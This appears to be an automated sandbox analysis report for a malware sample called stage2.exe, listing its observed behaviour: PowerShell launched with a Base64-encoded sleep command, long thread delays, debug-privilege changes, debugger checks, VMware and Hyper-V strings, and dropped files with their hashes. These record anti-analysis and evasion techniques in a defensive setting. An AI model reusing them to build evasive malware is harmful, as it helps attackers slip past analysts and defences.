Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_07EA67E1 push es; ret	2_2_07EA67EC
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_07A327A0 push ebp; ret	13_2_07A327B4
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_07A32780 push esp; ret	13_2_07A32794
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_07A3273A push esp; ret	13_2_07A32794
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_07A667E1 push es; ret	13_2_07A667EC

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6540	Thread sleep time: -2767011611056431s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6456	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6684	Thread sleep time: -4611686018427385s >= -30000s	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3260	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1461	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4329	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3659	Jump to behavior

Source: powershell.exe, 00000002.00000002.341349368.000000000501B000.00000004.00000001.sdmp	Binary or memory string: Hyper-V
Source: Amcache.hve.26.dr	Binary or memory string: VMware
Source: Amcache.hve.26.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000
Source: Amcache.hve.26.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.26.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.26.dr	Binary or memory string: VMware Virtual disk SCSI Disk Devicehbin
Source: powershell.exe, 00000002.00000002.341349368.000000000501B000.00000004.00000001.sdmp, powershell.exe, 0000000D.00000002.427690622.0000000004CA2000.00000004.00000001.sdmp	Binary or memory string: hl:C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V
Source: WerFault.exe, 0000001A.00000003.475719266.0000000004B86000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.475815541.0000000004BD3000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000002.478987968.0000000004B64000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000002.479105876.0000000004B86000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000002.479178780.0000000004BD3000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW
Source: Amcache.hve.26.dr	Binary or memory string: VMware, Inc.me
Source: WerFault.exe, 0000001A.00000003.473935861.0000000004BD3000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: Amcache.hve.26.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000
Source: Amcache.hve.26.dr	Binary or memory string: @scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
Source: Amcache.hve.26.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.26.dr	Binary or memory string: VMware7,1
Source: Amcache.hve.26.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.26.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.26.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW71.00V.13989454.B64.1906190538,BiosReleaseDate:06/19/2019,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware7,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.26.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.26.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.26.dr	Binary or memory string: VMware-42 35 d8 20 48 cb c7 ff-aa 5e d0 37 a0 49 53 d7
Source: stage2.exe, 00000001.00000002.480976922.00000000016AD000.00000004.00000020.sdmp, stage2.exe, 00000001.00000000.440746191.00000000016AD000.00000004.00000020.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll4}{
Source: powershell.exe, 0000000D.00000002.431025294.0000000007A94000.00000004.00000001.sdmp	Binary or memory string: hell\v1.0\Modules\Hyper-V
Source: Amcache.hve.26.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
Source: powershell.exe, 00000002.00000002.341127908.0000000004F02000.00000004.00000001.sdmp	Binary or memory string: hl:C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-VhD

Source: C:\Users\user\Desktop\stage2.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Users\user\Desktop\stage2.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Users\user\Desktop\stage2.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\Desktop\stage2.exe	Process created: Base64 decoded Start-Sleep -s 10
Source: C:\Users\user\Desktop\stage2.exe	Process created: Base64 decoded Start-Sleep -s 10
Source: C:\Users\user\Desktop\stage2.exe	Process created: Base64 decoded Start-Sleep -s 10	Jump to behavior
Source: C:\Users\user\Desktop\stage2.exe	Process created: Base64 decoded Start-Sleep -s 10	Jump to behavior

Source: stage2.exe, 00000001.00000000.438797900.0000000001D10000.00000002.00020000.sdmp, stage2.exe, 00000001.00000000.440989456.0000000001D10000.00000002.00020000.sdmp	Binary or memory string: Program Manager
Source: stage2.exe, 00000001.00000000.438797900.0000000001D10000.00000002.00020000.sdmp, stage2.exe, 00000001.00000000.440989456.0000000001D10000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: stage2.exe, 00000001.00000000.438797900.0000000001D10000.00000002.00020000.sdmp, stage2.exe, 00000001.00000000.440989456.0000000001D10000.00000002.00020000.sdmp	Binary or memory string: Progman
Source: stage2.exe, 00000001.00000000.438797900.0000000001D10000.00000002.00020000.sdmp, stage2.exe, 00000001.00000000.440989456.0000000001D10000.00000002.00020000.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\stage2.exe	Queries volume information: C:\Users\user\Desktop\stage2.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\stage2.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior

Source: Amcache.hve.26.dr, Amcache.hve.LOG1.26.dr	Binary or memory string: c:\users\user\desktop\procexp.exe
Source: Amcache.hve.26.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.26.dr, Amcache.hve.LOG1.26.dr	Binary or memory string: procexp.exe

ID:	553986
Product:	CloudBasic
Start time:	02:23:19
Start date:	17.01.2022
Sample:	stage2.exe
Cookbook:	default.jbs
System description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Architecture:	WINDOWS
MD5:	14c8482f302b5e81e3fa1b18a509289d
SHA1:	16525cb2fd86dce842107eb1ba6174b23f188537
SHA256:	dcbbae5a1c61dbbbb7dcd6dc5dd1eb1169f5329958d38b58c3fd9384081c9b78
Filetype:	Win32 Executable (generic) Net Framework (10011505/4) 50.01%

Name	Type	MD5	SHA1	SHA256
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_stage2.exe_71132b2d46f2be7ca5f7ca27edcda1a773a522_f347d55b_0069b9d6\Report.wer	Little-endian UTF-16 Unicode text, with CRLF line terminators	001C5A8A35F2A1BC8E8B554AAD9D99FB	14FB74DBD5C503FD7CAEE5454006BBC8F5D38A9F	5B31C7776A10B1EF5250A21468601C317530F710D1825100DFA2344B5397D5AD
C:\ProgramData\Microsoft\Windows\WER\Temp\WER14DB.tmp.dmp	Mini DuMP crash report, 15 streams, Mon Jan 17 10:25:36 2022, 0x1205a4 type	47039F84D9CE3BB540A5FF9C7A61CF31	85474DBDAB51F24FA6D607CC52DC64AAEB7B50B2	C9804775D078275DF81CF7CFFF3FBACCBD3BD9320912BA0976EFEDCAE3010692
C:\ProgramData\Microsoft\Windows\WER\Temp\WER318C.tmp.WERInternalMetadata.xml	XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators	0306EC771A2FC951837BE91CFBF8E011	3A272CDBEA785BE069408708146463007864479B	8335F027896C9E2A3D22A7B4DEBDD792618D2F87BF1A92B82685CBA121F160E6
C:\ProgramData\Microsoft\Windows\WER\Temp\WER3611.tmp.xml	XML 1.0 document, ASCII text, with CRLF line terminators	507EFECDC1ABF8B2E8511E0F7A40ABB0	0E29D507CD2497027B125A0C9C2B13D06A084595	AC230930084B32AC3153DA023ACE28A1C3614C28E833BF3A3EB4D8F02C4E2482
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache	data	36DE9155D6C265A1DE62A448F3B5B66E	02D21946CBDD01860A0DE38D7EEC6CDE3A964FC3	8BA38D55AA8F1E4F959E7223FDF653ABB9BE5B8B5DE9D116604E1ABB371C1C87
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	data	251C0346B0D4B607AE0308E7A63905CC	259BD3A23B07329B366836FEABFC5C375C2CFD98	ABD1AC4894EA5AC7AF272589E97472DFA394A8B3E0A92120732E551978952D42
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3hiw1gde.haw.ps1	very short file (no magic)	C4CA4238A0B923820DCC509A6F75849B	356A192B7913B04C54574D18C28D46E6395428AB	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dfyzxky1.kbr.psm1	very short file (no magic)	C4CA4238A0B923820DCC509A6F75849B	356A192B7913B04C54574D18C28D46E6395428AB	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kw2ltvwn.ds0.psm1	very short file (no magic)	C4CA4238A0B923820DCC509A6F75849B	356A192B7913B04C54574D18C28D46E6395428AB	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_z0qgkhds.0yb.ps1	very short file (no magic)	C4CA4238A0B923820DCC509A6F75849B	356A192B7913B04C54574D18C28D46E6395428AB	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
C:\Users\user\Documents\20220117\PowerShell_transcript.082561.7m2ZOLtQ.20220117022409.txt	UTF-8 Unicode (with BOM) text, with CRLF line terminators	BBD1DFD615841C5948E4F29E6C82F116	DD38516AE01450D37B9C323A441FCAA51E9D948C	46C7D5E25E092B25F45D7832CCE18B4FDBE5F3B2F30FDB9E7F05172A6F1CE603
C:\Users\user\Documents\20220117\PowerShell_transcript.082561.vEnUoizJ.20220117022446.txt	UTF-8 Unicode (with BOM) text, with CRLF line terminators	B5EF0789C51BC25618A8B8380106F073	C4B515F96607777B8ECCF44C84F014744D7C8AD3	6CF2DBD9945C70552992020AA9F6F0028209C8EAE18D1B080ABF9E75C5A25750
C:\Windows\appcompat\Programs\Amcache.hve	MS Windows registry file, NT/2000 or above	374743508B8FDB08634F0B0FBB5571B8	B86A1ED991E72FC4B4D930AB33BBA15CB1B0FB26	45420FB69A145CE87CB8B4B442D93AAF2A167AD97FF2C0B02A4FC7F6C5F1E1A8
C:\Windows\appcompat\Programs\Amcache.hve.LOG1	MS Windows registry file, NT/2000 or above	1E6B5359110A436CD426A10C18A64BD9	233D103FF0DF3EFD1788D1793E2DC82660BE1646	6EC713C240E5C0E01BEC5D131A8263237F04CB2D77EC465FC7914CA090BB8DEC

Windows Analysis Report stage2.exe

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection:

Cryptography:

Compliance:

Networking:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Lowering of HIPS / PFW / Operating System Security Settings:

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Private

Contacted Domains

Contacted URLs